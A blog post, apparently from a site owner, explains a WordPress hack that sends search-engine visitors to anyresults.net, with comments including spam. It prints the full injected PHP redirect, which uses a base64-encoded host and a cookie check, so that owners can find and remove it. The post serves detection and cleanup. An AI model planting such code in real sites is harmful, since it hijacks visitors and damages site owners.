WordPress AnyResults.net Hack - Search Engine Visits Redirecting to AnyResults.net
WordPress AnyResults.net Hack - Search Engine Visits Redirecting to AnyResults.net
Many sites that are running wordpress blogs have been hacked by a very clever and hidden PHP Injection which is redircting all requests from google, msn, live, altavista, ask, yahoo, and other search engines and redirecting it to 'anyresults.net' a site filled with pay-per-click ads and redirects to other landing pages. This is a very clever trick as visiting a web site either through a direct navigation type in or a bookmark does not display the problem. Only search engine visits are redirected and many site owners are delayed at discovering this problem untill they notice huge dips in traffic or revenue stats.
Many blogs and discussions on this provide very little help in finding this exploit. Some talk about a plug-in file as the colprete, some a wp-options table in the database, none of which were very helpful in this case.
If your blog is effected by this hack check your wp-blog-header.php file for the following code:
< ?php \ $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; } if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
Remove it completely or comment it out.
This code is using a base64 value for the string 'anyresults.net' which made it much more difficult to find the redirect string in any of the files.
It is recommended that you upgrade all of your WordPress sites to the most current and stable version immediately. This attack is possible for any sites not running the latest version of wordpress so you can understand the urgency of upgrading wordpress sites.
I'd like to plug the webs best web hosting provider Rackspace Server Admins, for helping me troubleshoot and identify this hack. As always, I seriously recommend hosting your websites with Rackspace.
While seeking solutions I discover some more good ideas on keeping your wordpress site safe on Matt Cutts blog topic: Three Tips to Protect Your Wordpress Installation.
http://www.youtube.com/watch?v=SxBslUERo9c
Click here to Register Domain Names at Searchen Networks, an Internet focused advertising company.
-
Labels: AnyResults, AnyResults.net, Hack, Search Engine Visits Redirecting, WordPress
Posted @ 7:12 AM
3 Comments
3 Comments:
I noticed the same thing happening on one of my blogs. I noticed because it I am using the Google sitemap plugin and Google was notifying me in Google Webmaster tools that one of the urls in the sitemap was returning a 302. I checked and checked using curl but couldn't reproduce the 302. I used a few online tools and some did give me a 302->301->200 and loop around the site randomly.
My guess is they are randomly performing redirects to their own site at times as well. I started disabling plugins starting with one which has repeatedly caused problems for my site, Angsuman's Translator Plugin Pro.
All the random redirects stopped when I removed the plugin. What's worse is the plugin code is encrypted so its difficult to tell what exactly is going on. My guess is they're using the encrypted plugin to randomly redirect visitors to their own sites in multiple different languages.
After a superantispyware complete search of all files it didn't find anything but some tracking cookies
But the tracking cookies were in the
C:\windows\system32\config\systemprofile folder
(I'm guessing this is the profile the system service uses)
the cookies were back after superantispyware deleted them and rebooted
iexplore had the cookies locked (after a clean reboot)
using the most excellent software unlocker
www.softpedia.com/get/System/System-Miscellaneous/Unlocker.shtml
I was able to unlock and delete the cookies (I deleted all the files in all the folders I found except user.dat (I left the folders)
my Google search is working again
By the way there was a redirect cookie in the folder
Back to normal and feeling lucky (Google pun)
Danny
To have a successful online business, a perfect online business system is required, and to create a successful online business system one has to analyze the current situation of one's business, set achievable goal, develop strategy/tactic, organize for the online presence (take action, control and form resources). http://www.infyecommercesolution.com/
Post a Comment
Subscribe to Post Comments [Atom]
<< Home